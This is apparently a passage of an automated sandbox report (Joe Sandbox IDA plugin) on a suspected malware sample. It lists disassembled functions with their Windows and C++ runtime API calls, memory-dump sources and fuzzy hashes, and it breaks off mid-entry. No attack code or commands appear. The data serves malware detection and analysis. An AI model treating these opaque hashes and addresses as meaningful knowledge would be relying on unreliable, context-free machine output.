                                      APIs
                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0094EA35
                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0094EA59
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094EA6C
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094EA7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                      • String ID: pScheduler
                                      • API String ID: 3657713681-923244539
                                      • Opcode ID: d18b1f9a5b5c2eab5675940a2e800b0e3d7d1f160fed843fa7f567d6ba483216
                                      • Instruction ID: 48fdf1ec0ecaec178ce24e0a305f76851a65a65226f43a6135a0eacc1e9f74a8
                                      • Opcode Fuzzy Hash: d18b1f9a5b5c2eab5675940a2e800b0e3d7d1f160fed843fa7f567d6ba483216
                                      • Instruction Fuzzy Hash: 1BF0E935900204A7CB24FA54D852E9EB37DBFC0B147148569E50663285EB70AD06C751
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 023ccc39e3ab9702eec2e1f91f534b62135b85e18f0d67b92d136bc39644d945
                                      • Instruction ID: d151c4fb2e6ff0047c1c8d0f86864cb257a1bd1779fbad0fe3ef6d94fb4f353a
                                      • Opcode Fuzzy Hash: 023ccc39e3ab9702eec2e1f91f534b62135b85e18f0d67b92d136bc39644d945
                                      • Instruction Fuzzy Hash: 307170359002169BDF219F99C884ABFBBBDFF85360F244229E915D7681E7709DC1CBA0
                                      APIs
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • _free.LIBCMT ref: 0097180F
                                      • _free.LIBCMT ref: 00971826
                                      • _free.LIBCMT ref: 00971845
                                      • _free.LIBCMT ref: 00971860
                                      • _free.LIBCMT ref: 00971877
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: 3b6606b9a506dfbf61ea3186e05546fb9092e7b6ca4f9b3493f494ab39bedb99
                                      • Instruction ID: 50070de58ad73f7771b471db6b9b2de92f4ba5862b3474bb3f3f8264ef1db318
                                      • Opcode Fuzzy Hash: 3b6606b9a506dfbf61ea3186e05546fb9092e7b6ca4f9b3493f494ab39bedb99
                                      • Instruction Fuzzy Hash: 0851A272A00704AFDB24DF6DC841BAA77F9EF88720F148669E84DD7250E731EA01CB81
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 84b7f865e3340b4e3d374949733f574e01d72a1da2fc15ac0836ed7ab2defa8f
                                      • Instruction ID: 0a0bbb6cce30dda955ddbec4030bd3221d8fca7f8537fe56f8bd0f4b4342ed3a
                                      • Opcode Fuzzy Hash: 84b7f865e3340b4e3d374949733f574e01d72a1da2fc15ac0836ed7ab2defa8f
                                      • Instruction Fuzzy Hash: 6841A333A00210DFDB14DF79C981B5AB7A5EFC5714F158569E519EB381EA31AD01CB81
                                      APIs
                                        • Part of subcall function 00940850: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00990C30,000000FF), ref: 0094092C
                                        • Part of subcall function 009404B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 009404F5
                                      • SetEvent.KERNEL32(00000000), ref: 00940609
                                      • ReleaseSemaphore.KERNEL32(00000000,?,00000000), ref: 0094061D
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00940642
                                      • CloseHandle.KERNEL32(00000000,?,BA3649C5,BA3649C5,0093F4C4,?,BA3649C5), ref: 00940676
                                      • SetEvent.KERNEL32(00000000,?,BA3649C5,BA3649C5,0093F4C4,?,BA3649C5), ref: 009406B3
                                        • Part of subcall function 008B50A0: CreateEventA.KERNEL32(?,?,?,?,BA3649C5,BA3649C5,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000), ref: 008B50D4
                                        • Part of subcall function 008B50A0: CloseHandle.KERNEL32(00000000,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 008B50EF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Event$CloseHandleReleaseSemaphore$CreateObjectSingleWait
                                      • String ID:
                                      • API String ID: 1436492870-0
                                      • Opcode ID: b261db0c13e9a07192ee90a789f5d019efa937781125dfb9d22520210d1ad811
                                      • Instruction ID: add85a7306f925497aca0a9d8a241e86c105913576ee57a579dc7450e192173e
                                      • Opcode Fuzzy Hash: b261db0c13e9a07192ee90a789f5d019efa937781125dfb9d22520210d1ad811
                                      • Instruction Fuzzy Hash: 06519D70A006159FDF11DF68C884B6ABBB4EB88324F1542A9EA15AB392D735ED11CB90
                                      APIs
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0095249A
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 009524F9
                                      • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0095251F
                                      • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0095253F
                                      • Concurrency::location::_Assign.LIBCMT ref: 0095258C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
                                      • String ID:
                                      • API String ID: 1794448563-0
                                      • Opcode ID: b46d12727a5e15c106941ff7e1f2df071796fd2437aa8f516354e01f1c8c8710
                                      • Instruction ID: f42352b21ca67ac04af6142f41af3b02b0f9defe21ffe9364eba2ea9b06fe31b
                                      • Opcode Fuzzy Hash: b46d12727a5e15c106941ff7e1f2df071796fd2437aa8f516354e01f1c8c8710
                                      • Instruction Fuzzy Hash: CC412970604210ABCF19DF29C896BBDBB78EF85750F144059F8069B382EF349D49C791
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC6D6
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC6F6
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC716
                                      • std::_Facet_Register.LIBCPMT ref: 008EC7B1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC7C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                      • String ID:
                                      • API String ID: 459529453-0
                                      • Opcode ID: 29d4c5a2ee27f0f78f87424781b419f5d44d9989af46c992e06555025147dd8d
                                      • Instruction ID: 5a8b24e6238867e18f694d07c161e143f159b46b5d1ff1a6f8f62b3548997b66
                                      • Opcode Fuzzy Hash: 29d4c5a2ee27f0f78f87424781b419f5d44d9989af46c992e06555025147dd8d
                                      • Instruction Fuzzy Hash: FB41DF72D04269DBCB20DF59D881BAEB7B4FB55710F14416AE806AB382DB30AD42CBC1
                                      APIs
                                      • _SpinWait.LIBCONCRT ref: 0094CAD6
                                        • Part of subcall function 00942B12: _SpinWait.LIBCONCRT ref: 00942B2A
                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0094CAEA
                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0094CB1C
                                      • List.LIBCMT ref: 0094CB9F
                                      • List.LIBCMT ref: 0094CBAE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                      • String ID:
                                      • API String ID: 3281396844-0
                                      • Opcode ID: fe1406ce8a18fd87bc25b532ffdb22d3df620a8786811f36146b99aab13f8c73
                                      • Instruction ID: 6b3659519cba3f03d8a9871c63767a3a63cb242fb12cb040daa2d7139f0fcdb7
                                      • Opcode Fuzzy Hash: fe1406ce8a18fd87bc25b532ffdb22d3df620a8786811f36146b99aab13f8c73
                                      • Instruction Fuzzy Hash: 843159B1906655DFCB64EFA4C592AEDB7B0FF44308F14416AE80177692DB316D04CBA1
                                      APIs
                                      • SetEvent.KERNEL32(?,00000000,?), ref: 0095541A
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00955402
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095544B
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0095547D
                                      • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,009CC3E8), ref: 00955482
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8SwitchThread
                                      • String ID:
                                      • API String ID: 2412095092-0
                                      • Opcode ID: cb528256eae75ec39819b8acc833510e19b3d08a85775813bf4e3d91c9202a4c
                                      • Instruction ID: db3443f810c9e242b7dbac13313d34732406db7be190fa443374cdfd9e973ee5
                                      • Opcode Fuzzy Hash: cb528256eae75ec39819b8acc833510e19b3d08a85775813bf4e3d91c9202a4c
                                      • Instruction Fuzzy Hash: B92129B5600214AFCB00EF69CC45E6EB7BCEB88761B01401AFA06E3291CA70AD418BA1
                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 0094E5CF
                                      • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 0094E61B
                                      • std::bad_exception::bad_exception.LIBCMT ref: 0094E631
                                      • std::bad_exception::bad_exception.LIBCMT ref: 0094E69D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094E6AB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::bad_exception::bad_exception$Concurrency::Exception@8H_prolog3_catchPolicyPolicy::_SchedulerThrowValidValue
                                      • String ID:
                                      • API String ID: 3702943636-0
                                      • Opcode ID: 73b05b22fdc0a4a0e7aa1426ccbf1bded4ad3a4d39a774d36d03054804f03ee8
                                      • Instruction ID: 22ac1b3ec3ae72f95f615aadd42494584b789cc80fc09c0a0f6b43ebfaaee1cd
                                      • Opcode Fuzzy Hash: 73b05b22fdc0a4a0e7aa1426ccbf1bded4ad3a4d39a774d36d03054804f03ee8
                                      • Instruction Fuzzy Hash: ED21C2B1900214EFDF04EFA4D886EADB7B4FF95314F21402AF445AB291EB31AE41CB55
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CDAD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CDD0
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CDF6
                                      • _free.LIBCMT ref: 0097CE09
                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CE18
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 5859f0be98d7786716b5b521e7a3e3ed64111a931cac3427982e242f247ea0c0
                                      • Instruction ID: 493c8adfe3df05f91cf1ec14ddcd88e18e30dcb2cd1a9ef20b1c6b38d9440eb1
                                      • Opcode Fuzzy Hash: 5859f0be98d7786716b5b521e7a3e3ed64111a931cac3427982e242f247ea0c0
                                      • Instruction Fuzzy Hash: C3018FB3605615BB27315ABA6C8CD7FAA6DDFC2FA1325812EFD0CD3141EA648D1291F0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Maklocstr$Maklocchr
                                      • String ID:
                                      • API String ID: 2020259771-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C1FE
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C208
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C259
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C279
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C297
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C158
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C162
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C1B3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C1D3
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C1F1
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C2A4
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C2AE
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C2FF
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C31F
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C33D
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C34A
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C354
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C3A5
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C3C5
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C3E3
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C5E2
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C5EC
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C63D
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C65D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C67B
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C53C
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C546
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C597
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C5B7
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C5D5
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C688
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C692
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C6E3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C703
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C721
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C72E
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C738
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C789
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C7A9
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C7C7
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938E9F
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938EA9
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00938EFA
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938F1A
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938F38
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938F45
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938F4F
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00938FA0
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938FC0
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938FDE
                                      Similarity
